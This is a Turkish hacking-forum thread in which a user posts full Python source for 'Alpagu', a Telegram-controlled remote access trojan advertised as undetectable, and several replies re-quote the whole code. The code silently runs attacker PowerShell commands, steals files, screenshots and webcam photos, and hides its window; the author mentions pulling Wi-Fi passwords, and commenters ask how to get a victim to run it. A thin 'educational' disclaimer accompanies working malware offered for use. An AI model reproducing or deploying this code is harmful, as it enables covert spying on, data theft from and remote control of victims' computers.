Alpagu v1.0 - %100 FUD(.py) Hedefin bütün bilgilerini alın! | Ekran Görüntüsü & WebCam & Dosya Çekme & Daha Fazlası

ATE$

Moderasyon Ekibi Çaylak
9 Kas 2021
317
128
Siber Şubede geziyor.Selamlar herkese, python ile yazdığım bu tool hedefinizde tam 8 adet fonksiyonu çalıştırmanıza izin veriyor. Karşı bilgisayarda arka planda çalışarak kullanıcıya kendini fark ettirmiyor ve sizin verdiğiniz komutları hedefin bilgisayarında çalıştırıyor. Eğitim amaçlıdır, kullanımı kişinin kendi sorumluluğundadır.

Bu fonksiyonlar:
 1. /start => bu mesajı gösterir​
 2. /dir => dizin bilgisini alır​
 3. /ip => ipconfig komutunu çalıştırır​
 4. /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır​
 5. /getfile {path} => belirtilen yoldaki dosyayı alır​
 6. /screenshot => ekran görüntüsü alır​
 7. /sendmessage {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır​
 8. /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker.​
/getfile


/screenshot


/takephoto


/sendmessage


/powershell
Bu komutla cmd üzerinde yapabileceğiniz her şeyi yapabilirsiniz... Ben örnek olarak wi-fi şifresini çektim.


/dir


VT:
VT LİNK
Kaynak Kodları:
Daha geliştirilebilir olduğunu biliyorum, eksik gördüğünüz yerleri ekleyebilirsiniz... Geliştirilmeye açıktır.
Python:
import sys
import telebot
import subprocess
import os
import cv2
import win32com.client
import atexit
import ctypes
import pyautogui
import winshell

API_TOKEN = 'API-KEY'

bot = telebot.TeleBot(API_TOKEN)

@bot.message_handler(commands=['start'])
def send_welcome(message):
  bot.reply_to(message, "Eğer hedef üzerinde dosya çalıştırılmışsa yazdığınız komutlara cevap alırsınız. \n \n 1- /start => bu mesajı gösterir \n 2- /dir => dizin bilgisini alır \n 3- /ip => ipconfig komutunu çalıştırır \n 4- /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır \n 5- /getfile {path} => belirtilen yoldaki dosyayı alır \n 6- /screenshot => ekran görüntüsü alır \n 7- /message {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır \n 8- /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker. \n \n BİLGİLENDİRME \n Bu araç eğitim faaliyetleri için yapılmıştır. Kullanımı kişinin kendi sorumluluğundadır. Aracı kullanmaya devam ediyorsanız yapılan faaliyetlerden aracı kullanan kişinin sorumlu olduğunu kabul ettiğiniz varsayılır. \n \n ")

@bot.message_handler(commands=['sendmessage'])
def alert(message):
  try:
    SendedMessage = message.text.split(' ', 1)[1]
    pyautogui.alert(SendedMessage)
    bot.reply_to(message, "Mesaj gönderildi...")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
  
@bot.message_handler(commands=['screenshot'])
def scrshot(message):
  try:
    size = pyautogui.size()
    screenShot = pyautogui.screenshot()
    screenShot.save('screenshot.png')
    file_path = 'screenshot.png'
    if os.path.exists(file_path):
       with open(file_path, 'rb') as file:
        bot.send_photo(message.chat.id, file)
        bot.reply_to(message, "Ekran boyutu: " + str(size) + "\n Ekran görüntüsü dosya adı: " + str('screenshot.png'))
       os.remove('screenshot.png')
      
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['getfile'])
def send_file(message):
  try:
    file_path = message.text.split(' ', 1)[1]
    if os.path.exists(file_path):
      with open(file_path, 'rb') as file:
        bot.send_document(message.chat.id, file)
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['ip'])
def send_ip(message):
  try:
    ip_address_bytes = subprocess.check_output(['ipconfig'], universal_newlines=True, encoding='cp437')
    ip_address = ip_address_bytes
    bot.reply_to(message, f"{ip_address}")
  except Exception as e:
    bot.reply_to(message, f"IP adresi alınamadı: {str(e)}")

@bot.message_handler(commands=['powershell'])
def run_powershell_command(message):
  try:
    command = message.text.split(' ', 1)[1]
    output = subprocess.check_output(['powershell', command], universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"PowerShell çıktısı:\n{output}")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['takephoto'])
def take_photo(message):
  try:
    cameras = []
    for i in range(4):
      cap = cv2.VideoCapture(i)
      if cap.isOpened():
        cameras.append(cap)
      else:
        break
    for cap in cameras:
      ret, frame = cap.read()
      if ret:
        cv2.imwrite(f"temp_photo_{cameras.index(cap)}.jpg", frame)
        with open(f"temp_photo_{cameras.index(cap)}.jpg", "rb") as photo:
          bot.send_photo(message.chat.id, photo)
        os.remove(f"temp_photo_{cameras.index(cap)}.jpg")
    for cap in cameras:
      cap.release()

  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
@bot.message_handler(commands=['dir'])
def send_dir(message):
  try:
    dir_command = 'C:\\Windows\\System32\\cmd.exe /c dir'
    directory_listing = subprocess.check_output(dir_command, universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"{directory_listing}")
  except Exception as e:
    bot.reply_to(message, f"Dizin bilgisi alınamadı: {str(e)}")

def run_bot():
  try:
    bot.polling()
    kernel32 = ctypes.WinDLL('kernel32')
    user32 = ctypes.WinDLL('user32')
    SW_HIDE = 0
    hWnd = kernel32.GetConsoleWindow()
    user32.ShowWindow(hWnd, SW_HIDE)
  except Exception as e:
    print(f"Bot çalıştırılırken bir hata oluştu: {str(e)}")

if __name__ == "__main__":
  run_bot()
Güzel olmuş.
 

Kvrmlkvrck

Yeni üye
30 Ağu 2019
13
1
Merhaba nasıl kullanacağım çalıştıracağı konusunda yardımcı olabilir misiniz . Teşekkürler:)
 

bqtw

Üye
22 May 2023
166
41Selamlar herkese, python ile yazdığım bu tool hedefinizde tam 8 adet fonksiyonu çalıştırmanıza izin veriyor. Karşı bilgisayarda arka planda çalışarak kullanıcıya kendini fark ettirmiyor ve sizin verdiğiniz komutları hedefin bilgisayarında çalıştırıyor. Eğitim amaçlıdır, kullanımı kişinin kendi sorumluluğundadır.

Bu fonksiyonlar:
 1. /start => bu mesajı gösterir​
 2. /dir => dizin bilgisini alır​
 3. /ip => ipconfig komutunu çalıştırır​
 4. /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır​
 5. /getfile {path} => belirtilen yoldaki dosyayı alır​
 6. /screenshot => ekran görüntüsü alır​
 7. /sendmessage {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır​
 8. /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker.​
/getfile


/screenshot


/takephoto


/sendmessage


/powershell
Bu komutla cmd üzerinde yapabileceğiniz her şeyi yapabilirsiniz... Ben örnek olarak wi-fi şifresini çektim.


/dir


VT:
VT LİNK
Kaynak Kodları:
Daha geliştirilebilir olduğunu biliyorum, eksik gördüğünüz yerleri ekleyebilirsiniz... Geliştirilmeye açıktır.
Python:
import sys
import telebot
import subprocess
import os
import cv2
import win32com.client
import atexit
import ctypes
import pyautogui
import winshell

API_TOKEN = 'API-KEY'

bot = telebot.TeleBot(API_TOKEN)

@bot.message_handler(commands=['start'])
def send_welcome(message):
  bot.reply_to(message, "Eğer hedef üzerinde dosya çalıştırılmışsa yazdığınız komutlara cevap alırsınız. \n \n 1- /start => bu mesajı gösterir \n 2- /dir => dizin bilgisini alır \n 3- /ip => ipconfig komutunu çalıştırır \n 4- /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır \n 5- /getfile {path} => belirtilen yoldaki dosyayı alır \n 6- /screenshot => ekran görüntüsü alır \n 7- /message {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır \n 8- /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker. \n \n BİLGİLENDİRME \n Bu araç eğitim faaliyetleri için yapılmıştır. Kullanımı kişinin kendi sorumluluğundadır. Aracı kullanmaya devam ediyorsanız yapılan faaliyetlerden aracı kullanan kişinin sorumlu olduğunu kabul ettiğiniz varsayılır. \n \n ")

@bot.message_handler(commands=['sendmessage'])
def alert(message):
  try:
    SendedMessage = message.text.split(' ', 1)[1]
    pyautogui.alert(SendedMessage)
    bot.reply_to(message, "Mesaj gönderildi...")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
  
@bot.message_handler(commands=['screenshot'])
def scrshot(message):
  try:
    size = pyautogui.size()
    screenShot = pyautogui.screenshot()
    screenShot.save('screenshot.png')
    file_path = 'screenshot.png'
    if os.path.exists(file_path):
       with open(file_path, 'rb') as file:
        bot.send_photo(message.chat.id, file)
        bot.reply_to(message, "Ekran boyutu: " + str(size) + "\n Ekran görüntüsü dosya adı: " + str('screenshot.png'))
       os.remove('screenshot.png')
      
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['getfile'])
def send_file(message):
  try:
    file_path = message.text.split(' ', 1)[1]
    if os.path.exists(file_path):
      with open(file_path, 'rb') as file:
        bot.send_document(message.chat.id, file)
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['ip'])
def send_ip(message):
  try:
    ip_address_bytes = subprocess.check_output(['ipconfig'], universal_newlines=True, encoding='cp437')
    ip_address = ip_address_bytes
    bot.reply_to(message, f"{ip_address}")
  except Exception as e:
    bot.reply_to(message, f"IP adresi alınamadı: {str(e)}")

@bot.message_handler(commands=['powershell'])
def run_powershell_command(message):
  try:
    command = message.text.split(' ', 1)[1]
    output = subprocess.check_output(['powershell', command], universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"PowerShell çıktısı:\n{output}")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['takephoto'])
def take_photo(message):
  try:
    cameras = []
    for i in range(4):
      cap = cv2.VideoCapture(i)
      if cap.isOpened():
        cameras.append(cap)
      else:
        break
    for cap in cameras:
      ret, frame = cap.read()
      if ret:
        cv2.imwrite(f"temp_photo_{cameras.index(cap)}.jpg", frame)
        with open(f"temp_photo_{cameras.index(cap)}.jpg", "rb") as photo:
          bot.send_photo(message.chat.id, photo)
        os.remove(f"temp_photo_{cameras.index(cap)}.jpg")
    for cap in cameras:
      cap.release()

  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
@bot.message_handler(commands=['dir'])
def send_dir(message):
  try:
    dir_command = 'C:\\Windows\\System32\\cmd.exe /c dir'
    directory_listing = subprocess.check_output(dir_command, universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"{directory_listing}")
  except Exception as e:
    bot.reply_to(message, f"Dizin bilgisi alınamadı: {str(e)}")

def run_bot():
  try:
    bot.polling()
    kernel32 = ctypes.WinDLL('kernel32')
    user32 = ctypes.WinDLL('user32')
    SW_HIDE = 0
    hWnd = kernel32.GetConsoleWindow()
    user32.ShowWindow(hWnd, SW_HIDE)
  except Exception as e:
    print(f"Bot çalıştırılırken bir hata oluştu: {str(e)}")

if __name__ == "__main__":
  run_bot()
Elinize sağlık hocam lakin şeyi anlamadım hedef bilgisayar python kodunumu başlatması lazım yoksa botumu yani bunu kurbana nasıl yediricez ?
 

Zilant

Yazılım Ekibi Asistanı
25 Tem 2021
196
172
Kazan Şehri - Tataristan
Elinize sağlık hocam lakin şeyi anlamadım hedef bilgisayar python kodunumu başlatması lazım yoksa botumu yani bunu kurbana nasıl yediricez ?
Teşekkürler, karşı tarafın dosyayı açması yeterli. Kendini arka plana alıp arka planda çalışmaya devam ediyor.
biraz python bilgisi ile yazabilirsiniz
Evet çok zor değil yazması, 1 gecede yazdım ben :)
Abo zero clicks exploit hacks mi acaba? Xd
:D
 

memoalican

Üye
25 Nis 2020
100
6
Android telefondan bakma hem fud varsa iyi olur yani APK to APK.
Bide Iphone de yaparsan super olur....
Hem lıve camera en guzel kalıte sevınırim hem fud olarak,,,,
 

Qalib

Yeni üye
31 Ocak 2016
1
0Selamlar herkese, python ile yazdığım bu tool hedefinizde tam 8 adet fonksiyonu çalıştırmanıza izin veriyor. Karşı bilgisayarda arka planda çalışarak kullanıcıya kendini fark ettirmiyor ve sizin verdiğiniz komutları hedefin bilgisayarında çalıştırıyor. Eğitim amaçlıdır, kullanımı kişinin kendi sorumluluğundadır.

Bu fonksiyonlar:
 1. /start => bu mesajı gösterir​
 2. /dir => dizin bilgisini alır​
 3. /ip => ipconfig komutunu çalıştırır​
 4. /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır​
 5. /getfile {path} => belirtilen yoldaki dosyayı alır​
 6. /screenshot => ekran görüntüsü alır​
 7. /sendmessage {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır​
 8. /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker.​
/getfile


/screenshot


/takephoto


/sendmessage


/powershell
Bu komutla cmd üzerinde yapabileceğiniz her şeyi yapabilirsiniz... Ben örnek olarak wi-fi şifresini çektim.


/dir


VT:
VT LİNK
Kaynak Kodları:
Daha geliştirilebilir olduğunu biliyorum, eksik gördüğünüz yerleri ekleyebilirsiniz... Geliştirilmeye açıktır.
Python:
import sys
import telebot
import subprocess
import os
import cv2
import win32com.client
import atexit
import ctypes
import pyautogui
import winshell

API_TOKEN = 'API-KEY'

bot = telebot.TeleBot(API_TOKEN)

@bot.message_handler(commands=['start'])
def send_welcome(message):
  bot.reply_to(message, "Eğer hedef üzerinde dosya çalıştırılmışsa yazdığınız komutlara cevap alırsınız. \n \n 1- /start => bu mesajı gösterir \n 2- /dir => dizin bilgisini alır \n 3- /ip => ipconfig komutunu çalıştırır \n 4- /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır \n 5- /getfile {path} => belirtilen yoldaki dosyayı alır \n 6- /screenshot => ekran görüntüsü alır \n 7- /message {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır \n 8- /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker. \n \n BİLGİLENDİRME \n Bu araç eğitim faaliyetleri için yapılmıştır. Kullanımı kişinin kendi sorumluluğundadır. Aracı kullanmaya devam ediyorsanız yapılan faaliyetlerden aracı kullanan kişinin sorumlu olduğunu kabul ettiğiniz varsayılır. \n \n ")

@bot.message_handler(commands=['sendmessage'])
def alert(message):
  try:
    SendedMessage = message.text.split(' ', 1)[1]
    pyautogui.alert(SendedMessage)
    bot.reply_to(message, "Mesaj gönderildi...")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
  
@bot.message_handler(commands=['screenshot'])
def scrshot(message):
  try:
    size = pyautogui.size()
    screenShot = pyautogui.screenshot()
    screenShot.save('screenshot.png')
    file_path = 'screenshot.png'
    if os.path.exists(file_path):
       with open(file_path, 'rb') as file:
        bot.send_photo(message.chat.id, file)
        bot.reply_to(message, "Ekran boyutu: " + str(size) + "\n Ekran görüntüsü dosya adı: " + str('screenshot.png'))
       os.remove('screenshot.png')
      
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['getfile'])
def send_file(message):
  try:
    file_path = message.text.split(' ', 1)[1]
    if os.path.exists(file_path):
      with open(file_path, 'rb') as file:
        bot.send_document(message.chat.id, file)
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['ip'])
def send_ip(message):
  try:
    ip_address_bytes = subprocess.check_output(['ipconfig'], universal_newlines=True, encoding='cp437')
    ip_address = ip_address_bytes
    bot.reply_to(message, f"{ip_address}")
  except Exception as e:
    bot.reply_to(message, f"IP adresi alınamadı: {str(e)}")

@bot.message_handler(commands=['powershell'])
def run_powershell_command(message):
  try:
    command = message.text.split(' ', 1)[1]
    output = subprocess.check_output(['powershell', command], universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"PowerShell çıktısı:\n{output}")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['takephoto'])
def take_photo(message):
  try:
    cameras = []
    for i in range(4):
      cap = cv2.VideoCapture(i)
      if cap.isOpened():
        cameras.append(cap)
      else:
        break
    for cap in cameras:
      ret, frame = cap.read()
      if ret:
        cv2.imwrite(f"temp_photo_{cameras.index(cap)}.jpg", frame)
        with open(f"temp_photo_{cameras.index(cap)}.jpg", "rb") as photo:
          bot.send_photo(message.chat.id, photo)
        os.remove(f"temp_photo_{cameras.index(cap)}.jpg")
    for cap in cameras:
      cap.release()

  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
@bot.message_handler(commands=['dir'])
def send_dir(message):
  try:
    dir_command = 'C:\\Windows\\System32\\cmd.exe /c dir'
    directory_listing = subprocess.check_output(dir_command, universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"{directory_listing}")
  except Exception as e:
    bot.reply_to(message, f"Dizin bilgisi alınamadı: {str(e)}")

def run_bot():
  try:
    bot.polling()
    kernel32 = ctypes.WinDLL('kernel32')
    user32 = ctypes.WinDLL('user32')
    SW_HIDE = 0
    hWnd = kernel32.GetConsoleWindow()
    user32.ShowWindow(hWnd, SW_HIDE)
  except Exception as e:
    print(f"Bot çalıştırılırken bir hata oluştu: {str(e)}")

if __name__ == "__main__":
  run_bot()
Eline sağlık
 

Saga_1268

Yeni üye
23 Eyl 2023
28
10Selamlar herkese, python ile yazdığım bu tool hedefinizde tam 8 adet fonksiyonu çalıştırmanıza izin veriyor. Karşı bilgisayarda arka planda çalışarak kullanıcıya kendini fark ettirmiyor ve sizin verdiğiniz komutları hedefin bilgisayarında çalıştırıyor. Eğitim amaçlıdır, kullanımı kişinin kendi sorumluluğundadır.

Bu fonksiyonlar:
 1. /start => bu mesajı gösterir​
 2. /dir => dizin bilgisini alır​
 3. /ip => ipconfig komutunu çalıştırır​
 4. /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır​
 5. /getfile {path} => belirtilen yoldaki dosyayı alır​
 6. /screenshot => ekran görüntüsü alır​
 7. /sendmessage {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır​
 8. /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker.​
/getfile


/screenshot


/takephoto


/sendmessage


/powershell
Bu komutla cmd üzerinde yapabileceğiniz her şeyi yapabilirsiniz... Ben örnek olarak wi-fi şifresini çektim.


/dir


VT:
VT LİNK
Kaynak Kodları:
Daha geliştirilebilir olduğunu biliyorum, eksik gördüğünüz yerleri ekleyebilirsiniz... Geliştirilmeye açıktır.
Python:
import sys
import telebot
import subprocess
import os
import cv2
import win32com.client
import atexit
import ctypes
import pyautogui
import winshell

API_TOKEN = 'API-KEY'

bot = telebot.TeleBot(API_TOKEN)

@bot.message_handler(commands=['start'])
def send_welcome(message):
  bot.reply_to(message, "Eğer hedef üzerinde dosya çalıştırılmışsa yazdığınız komutlara cevap alırsınız. \n \n 1- /start => bu mesajı gösterir \n 2- /dir => dizin bilgisini alır \n 3- /ip => ipconfig komutunu çalıştırır \n 4- /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır \n 5- /getfile {path} => belirtilen yoldaki dosyayı alır \n 6- /screenshot => ekran görüntüsü alır \n 7- /message {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır \n 8- /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker. \n \n BİLGİLENDİRME \n Bu araç eğitim faaliyetleri için yapılmıştır. Kullanımı kişinin kendi sorumluluğundadır. Aracı kullanmaya devam ediyorsanız yapılan faaliyetlerden aracı kullanan kişinin sorumlu olduğunu kabul ettiğiniz varsayılır. \n \n ")

@bot.message_handler(commands=['sendmessage'])
def alert(message):
  try:
    SendedMessage = message.text.split(' ', 1)[1]
    pyautogui.alert(SendedMessage)
    bot.reply_to(message, "Mesaj gönderildi...")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
  
@bot.message_handler(commands=['screenshot'])
def scrshot(message):
  try:
    size = pyautogui.size()
    screenShot = pyautogui.screenshot()
    screenShot.save('screenshot.png')
    file_path = 'screenshot.png'
    if os.path.exists(file_path):
       with open(file_path, 'rb') as file:
        bot.send_photo(message.chat.id, file)
        bot.reply_to(message, "Ekran boyutu: " + str(size) + "\n Ekran görüntüsü dosya adı: " + str('screenshot.png'))
       os.remove('screenshot.png')
      
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['getfile'])
def send_file(message):
  try:
    file_path = message.text.split(' ', 1)[1]
    if os.path.exists(file_path):
      with open(file_path, 'rb') as file:
        bot.send_document(message.chat.id, file)
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['ip'])
def send_ip(message):
  try:
    ip_address_bytes = subprocess.check_output(['ipconfig'], universal_newlines=True, encoding='cp437')
    ip_address = ip_address_bytes
    bot.reply_to(message, f"{ip_address}")
  except Exception as e:
    bot.reply_to(message, f"IP adresi alınamadı: {str(e)}")

@bot.message_handler(commands=['powershell'])
def run_powershell_command(message):
  try:
    command = message.text.split(' ', 1)[1]
    output = subprocess.check_output(['powershell', command], universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"PowerShell çıktısı:\n{output}")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['takephoto'])
def take_photo(message):
  try:
    cameras = []
    for i in range(4):
      cap = cv2.VideoCapture(i)
      if cap.isOpened():
        cameras.append(cap)
      else:
        break
    for cap in cameras:
      ret, frame = cap.read()
      if ret:
        cv2.imwrite(f"temp_photo_{cameras.index(cap)}.jpg", frame)
        with open(f"temp_photo_{cameras.index(cap)}.jpg", "rb") as photo:
          bot.send_photo(message.chat.id, photo)
        os.remove(f"temp_photo_{cameras.index(cap)}.jpg")
    for cap in cameras:
      cap.release()

  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
@bot.message_handler(commands=['dir'])
def send_dir(message):
  try:
    dir_command = 'C:\\Windows\\System32\\cmd.exe /c dir'
    directory_listing = subprocess.check_output(dir_command, universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"{directory_listing}")
  except Exception as e:
    bot.reply_to(message, f"Dizin bilgisi alınamadı: {str(e)}")

def run_bot():
  try:
    bot.polling()
    kernel32 = ctypes.WinDLL('kernel32')
    user32 = ctypes.WinDLL('user32')
    SW_HIDE = 0
    hWnd = kernel32.GetConsoleWindow()
    user32.ShowWindow(hWnd, SW_HIDE)
  except Exception as e:
    print(f"Bot çalıştırılırken bir hata oluştu: {str(e)}")

if __name__ == "__main__":
  run_bot()
Eline emeğine sağlık yaralı bir konu
 

Zilant

Yazılım Ekibi Asistanı
25 Tem 2021
196
172
Kazan Şehri - Tataristan
Klavyene sağlık hocam yeni sürümlerini bekliyorum <3
Teşekkür ederim aslnbkr27
ah karsi daki python py mi acmali maalesef zero exploıt zanetim....
Evet açmalı dosyayı
Android telefondan bakma hem fud varsa iyi olur yani APK to APK.
Bide Iphone de yaparsan super olur....
Hem lıve camera en guzel kalıte sevınırim hem fud olarak,,,,
Öyle bir planım yok.
Eline emeğine sağlık yaralı bir konu
Elinize ve emeğinize sağlık
Teşekkür ederim
 
6 Şub 2022
134
26Selamlar herkese, python ile yazdığım bu tool hedefinizde tam 8 adet fonksiyonu çalıştırmanıza izin veriyor. Karşı bilgisayarda arka planda çalışarak kullanıcıya kendini fark ettirmiyor ve sizin verdiğiniz komutları hedefin bilgisayarında çalıştırıyor. Eğitim amaçlıdır, kullanımı kişinin kendi sorumluluğundadır.

Bu fonksiyonlar:
 1. /start => bu mesajı gösterir​
 2. /dir => dizin bilgisini alır​
 3. /ip => ipconfig komutunu çalıştırır​
 4. /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır​
 5. /getfile {path} => belirtilen yoldaki dosyayı alır​
 6. /screenshot => ekran görüntüsü alır​
 7. /sendmessage {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır​
 8. /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker.​
/getfile

gxgexk4.jpg


/screenshot


/takephoto


/sendmessage


/powershell
Bu komutla cmd üzerinde yapabileceğiniz her şeyi yapabilirsiniz... Ben örnek olarak wi-fi şifresini çektim.


/dir


VT:
VT LİNK
Kaynak Kodları:
Daha geliştirilebilir olduğunu biliyorum, eksik gördüğünüz yerleri ekleyebilirsiniz... Geliştirilmeye açıktır.
Python:
import sys
import telebot
import subprocess
import os
import cv2
import win32com.client
import atexit
import ctypes
import pyautogui
import winshell

API_TOKEN = 'API-KEY'

bot = telebot.TeleBot(API_TOKEN)

@bot.message_handler(commands=['start'])
def send_welcome(message):
  bot.reply_to(message, "Eğer hedef üzerinde dosya çalıştırılmışsa yazdığınız komutlara cevap alırsınız. \n \n 1- /start => bu mesajı gösterir \n 2- /dir => dizin bilgisini alır \n 3- /ip => ipconfig komutunu çalıştırır \n 4- /powershell {powershell komutu} => girdiğiniz powershell komutunu hedef sistem üzerinde çalıştırır \n 5- /getfile {path} => belirtilen yoldaki dosyayı alır \n 6- /screenshot => ekran görüntüsü alır \n 7- /message {mesaj içeriği} => hedefin ekranında mesaj kutucuğu çıkartır \n 8- /takephoto => bilgisayarın tüm kameralarına erişip hepsinden fotoğraf çeker. \n \n BİLGİLENDİRME \n Bu araç eğitim faaliyetleri için yapılmıştır. Kullanımı kişinin kendi sorumluluğundadır. Aracı kullanmaya devam ediyorsanız yapılan faaliyetlerden aracı kullanan kişinin sorumlu olduğunu kabul ettiğiniz varsayılır. \n \n ")

@bot.message_handler(commands=['sendmessage'])
def alert(message):
  try:
    SendedMessage = message.text.split(' ', 1)[1]
    pyautogui.alert(SendedMessage)
    bot.reply_to(message, "Mesaj gönderildi...")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
 
@bot.message_handler(commands=['screenshot'])
def scrshot(message):
  try:
    size = pyautogui.size()
    screenShot = pyautogui.screenshot()
    screenShot.save('screenshot.png')
    file_path = 'screenshot.png'
    if os.path.exists(file_path):
       with open(file_path, 'rb') as file:
        bot.send_photo(message.chat.id, file)
        bot.reply_to(message, "Ekran boyutu: " + str(size) + "\n Ekran görüntüsü dosya adı: " + str('screenshot.png'))
       os.remove('screenshot.png')
     
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['getfile'])
def send_file(message):
  try:
    file_path = message.text.split(' ', 1)[1]
    if os.path.exists(file_path):
      with open(file_path, 'rb') as file:
        bot.send_document(message.chat.id, file)
    else:
      bot.reply_to(message, "Belirtilen dosya bulunamadı.")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['ip'])
def send_ip(message):
  try:
    ip_address_bytes = subprocess.check_output(['ipconfig'], universal_newlines=True, encoding='cp437')
    ip_address = ip_address_bytes
    bot.reply_to(message, f"{ip_address}")
  except Exception as e:
    bot.reply_to(message, f"IP adresi alınamadı: {str(e)}")

@bot.message_handler(commands=['powershell'])
def run_powershell_command(message):
  try:
    command = message.text.split(' ', 1)[1]
    output = subprocess.check_output(['powershell', command], universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"PowerShell çıktısı:\n{output}")
  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")

@bot.message_handler(commands=['takephoto'])
def take_photo(message):
  try:
    cameras = []
    for i in range(4):
      cap = cv2.VideoCapture(i)
      if cap.isOpened():
        cameras.append(cap)
      else:
        break
    for cap in cameras:
      ret, frame = cap.read()
      if ret:
        cv2.imwrite(f"temp_photo_{cameras.index(cap)}.jpg", frame)
        with open(f"temp_photo_{cameras.index(cap)}.jpg", "rb") as photo:
          bot.send_photo(message.chat.id, photo)
        os.remove(f"temp_photo_{cameras.index(cap)}.jpg")
    for cap in cameras:
      cap.release()

  except Exception as e:
    bot.reply_to(message, f"Hata: {str(e)}")
@bot.message_handler(commands=['dir'])
def send_dir(message):
  try:
    dir_command = 'C:\\Windows\\System32\\cmd.exe /c dir'
    directory_listing = subprocess.check_output(dir_command, universal_newlines=True, shell=True, encoding='cp437')
    bot.reply_to(message, f"{directory_listing}")
  except Exception as e:
    bot.reply_to(message, f"Dizin bilgisi alınamadı: {str(e)}")

def run_bot():
  try:
    bot.polling()
    kernel32 = ctypes.WinDLL('kernel32')
    user32 = ctypes.WinDLL('user32')
    SW_HIDE = 0
    hWnd = kernel32.GetConsoleWindow()
    user32.ShowWindow(hWnd, SW_HIDE)
  except Exception as e:
    print(f"Bot çalıştırılırken bir hata oluştu: {str(e)}")

if __name__ == "__main__":
  run_bot()
Nasıl indirebiliriz
 
Üst

